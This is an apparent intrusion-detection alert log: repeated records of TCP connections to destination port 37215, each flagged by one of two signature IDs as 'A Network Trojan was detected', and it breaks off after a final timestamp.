          Timestamp:06/08/24-15:05:16.671213
          SID:2829579
          Source Port:56456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709734
          SID:2829579
          Source Port:47852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446565
          SID:2829579
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464786
          SID:2829579
          Source Port:50738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269840
          SID:2835222
          Source Port:41024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741309
          SID:2829579
          Source Port:60942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782679
          SID:2829579
          Source Port:55720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108200
          SID:2829579
          Source Port:57584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107862
          SID:2829579
          Source Port:44328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396800
          SID:2829579
          Source Port:42020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059177
          SID:2829579
          Source Port:40776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174442
          SID:2835222
          Source Port:41900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191918
          SID:2829579
          Source Port:46930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463435
          SID:2835222
          Source Port:33998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792897
          SID:2829579
          Source Port:54402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351613
          SID:2829579
          Source Port:39372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159855
          SID:2835222
          Source Port:43848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259612
          SID:2835222
          Source Port:45374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179756
          SID:2829579
          Source Port:43186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853175
          SID:2835222
          Source Port:57916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911579
          SID:2829579
          Source Port:50708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018148
          SID:2835222
          Source Port:33366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546898
          SID:2829579
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819321
          SID:2829579
          Source Port:44814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020208
          SID:2835222
          Source Port:34154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078930
          SID:2835222
          Source Port:56286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512009
          SID:2835222
          Source Port:58570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729852
          SID:2829579
          Source Port:52170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408326
          SID:2835222
          Source Port:33270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087309
          SID:2829579
          Source Port:37060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184064
          SID:2835222
          Source Port:39892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780471
          SID:2835222
          Source Port:60058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599606
          SID:2835222
          Source Port:52392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444318
          SID:2829579
          Source Port:43994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261091
          SID:2835222
          Source Port:40084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822835
          SID:2835222
          Source Port:37332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111789
          SID:2829579
          Source Port:47332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780940
          SID:2829579
          Source Port:60540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402275
          SID:2829579
          Source Port:50348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817068
          SID:2835222
          Source Port:46848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729967
          SID:2829579
          Source Port:58018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056479
          SID:2835222
          Source Port:43668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272178
          SID:2835222
          Source Port:45262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302995
          SID:2829579
          Source Port:48172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.462864
          SID:2835222
          Source Port:46892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734581
          SID:2835222
          Source Port:47942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857599
          SID:2835222
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.144339
          SID:2829579
          Source Port:39980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396125
          SID:2829579
          Source Port:43990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356307
          SID:2829579
          Source Port:58654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858307
          SID:2829579
          Source Port:33160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808558
          SID:2835222
          Source Port:49364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.740910
          SID:2829579
          Source Port:33014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238156
          SID:2829579
          Source Port:45834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352832
          SID:2835222
          Source Port:57346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152641
          SID:2829579
          Source Port:53304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352648
          SID:2835222
          Source Port:36324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741805
          SID:2835222
          Source Port:36146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446052
          SID:2835222
          Source Port:55858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892218
          SID:2835222
          Source Port:50500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788282
          SID:2829579
          Source Port:38010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893805
          SID:2829579
          Source Port:36366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842199
          SID:2829579
          Source Port:41802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173729
          SID:2835222
          Source Port:40018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160870
          SID:2829579
          Source Port:45046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164791
          SID:2829579
          Source Port:49448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294900
          SID:2829579
          Source Port:36076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449946
          SID:2829579
          Source Port:60942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861136
          SID:2829579
          Source Port:54300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671196
          SID:2829579
          Source Port:44218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042355
          SID:2829579
          Source Port:46738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461072
          SID:2829579
          Source Port:34376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448875
          SID:2835222
          Source Port:50518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178549
          SID:2835222
          Source Port:41166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744940
          SID:2835222
          Source Port:56336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554667
          SID:2829579
          Source Port:58716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112513
          SID:2835222
          Source Port:42500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795677
          SID:2829579
          Source Port:39196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805038
          SID:2829579
          Source Port:42390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671659
          SID:2829579
          Source Port:35378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465947
          SID:2835222
          Source Port:40230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781992
          SID:2829579
          Source Port:44290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554364
          SID:2835222
          Source Port:42920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668460
          SID:2835222
          Source Port:53178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174694
          SID:2835222
          Source Port:57400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271724
          SID:2829579
          Source Port:43272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159324
          SID:2835222
          Source Port:53094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260994
          SID:2829579
          Source Port:39122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745694
          SID:2829579
          Source Port:41900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787586
          SID:2829579
          Source Port:56838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241256
          SID:2829579
          Source Port:59410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408291
          SID:2835222
          Source Port:51208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817651
          SID:2829579
          Source Port:37328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853573
          SID:2829579
          Source Port:43896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512565
          SID:2829579
          Source Port:49788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257665
          SID:2829579
          Source Port:36244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788268
          SID:2835222
          Source Port:36416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350628
          SID:2835222
          Source Port:50834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.831235
          SID:2835222
          Source Port:33786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884560
          SID:2829579
          Source Port:50936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128614
          SID:2829579
          Source Port:46814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741342
          SID:2835222
          Source Port:33018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742153
          SID:2835222
          Source Port:50208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159054
          SID:2829579
          Source Port:46862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108772
          SID:2835222
          Source Port:39626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706616
          SID:2835222
          Source Port:33390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114076
          SID:2829579
          Source Port:57806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510085
          SID:2829579
          Source Port:56094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295032
          SID:2829579
          Source Port:48944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178687
          SID:2835222
          Source Port:58192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706585
          SID:2829579
          Source Port:56164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855075
          SID:2829579
          Source Port:54418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306260
          SID:2835222
          Source Port:44198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784116
          SID:2835222
          Source Port:35146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175003
          SID:2835222
          Source Port:50608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404989
          SID:2835222
          Source Port:50448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670554
          SID:2835222
          Source Port:48004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743858
          SID:2829579
          Source Port:59024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.061834
          SID:2829579
          Source Port:33026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130130
          SID:2829579
          Source Port:53638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173658
          SID:2835222
          Source Port:46012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747687
          SID:2829579
          Source Port:48078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405758
          SID:2835222
          Source Port:60410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466015
          SID:2829579
          Source Port:35586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087272
          SID:2829579
          Source Port:51448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857505
          SID:2835222
          Source Port:38948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911524
          SID:2829579
          Source Port:45848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157391
          SID:2835222
          Source Port:58174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272823
          SID:2829579
          Source Port:40516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161237
          SID:2835222
          Source Port:48644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862413
          SID:2829579
          Source Port:38042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041612
          SID:2829579
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466515
          SID:2829579
          Source Port:39430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893478
          SID:2835222
          Source Port:55954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067486
          SID:2835222
          Source Port:44586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781699
          SID:2829579
          Source Port:57312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795303
          SID:2835222
          Source Port:53006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243003
          SID:2829579
          Source Port:42010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745547
          SID:2835222
          Source Port:46398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.853764
          SID:2835222
          Source Port:56490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893913
          SID:2835222
          Source Port:33716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746082
          SID:2835222
          Source Port:36932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729327
          SID:2829579
          Source Port:49244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109282
          SID:2835222
          Source Port:52554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.455434
          SID:2829579
          Source Port:57086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732572
          SID:2829579
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162926
          SID:2835222
          Source Port:52612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740201
          SID:2829579
          Source Port:37474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782631
          SID:2829579
          Source Port:54868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815596
          SID:2835222
          Source Port:43826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353638
          SID:2829579
          Source Port:48496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272087
          SID:2829579
          Source Port:49750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039532
          SID:2835222
          Source Port:39252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786321
          SID:2829579
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192425
          SID:2835222
          Source Port:50318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668160
          SID:2829579
          Source Port:38552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396334
          SID:2829579
          Source Port:46448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179273
          SID:2835222
          Source Port:39858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735126
          SID:2835222
          Source Port:56164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818677
          SID:2835222
          Source Port:37936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158025
          SID:2835222
          Source Port:59386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512434
          SID:2829579
          Source Port:43972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811080
          SID:2835222
          Source Port:57742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161360
          SID:2829579
          Source Port:43614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126736
          SID:2829579
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911353
          SID:2829579
          Source Port:34798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039412
          SID:2829579
          Source Port:43440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270583
          SID:2835222
          Source Port:59370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129392
          SID:2829579
          Source Port:55712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514100
          SID:2829579
          Source Port:34054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407300
          SID:2829579
          Source Port:58426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016177
          SID:2829579
          Source Port:46808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894664
          SID:2835222
          Source Port:47172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551576
          SID:2835222
          Source Port:54222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737023
          SID:2829579
          Source Port:58986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743886
          SID:2835222
          Source Port:59188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410084
          SID:2829579
          Source Port:49252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546482
          SID:2829579
          Source Port:57170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055159
          SID:2835222
          Source Port:43058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352441
          SID:2829579
          Source Port:42386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468619
          SID:2829579
          Source Port:36622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731623
          SID:2829579
          Source Port:51300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295736
          SID:2835222
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444564
          SID:2835222
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136245
          SID:2835222
          Source Port:58416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294913
          SID:2829579
          Source Port:37108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166616
          SID:2829579
          Source Port:47814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114177
          SID:2835222
          Source Port:59928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260975
          SID:2835222
          Source Port:38778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781445
          SID:2829579
          Source Port:53552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747183
          SID:2829579
          Source Port:39408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355248
          SID:2835222
          Source Port:40422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795799
          SID:2829579
          Source Port:32786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132632
          SID:2829579
          Source Port:58814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040300
          SID:2835222
          Source Port:49498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352766
          SID:2835222
          Source Port:56604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136142
          SID:2829579
          Source Port:45140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238898
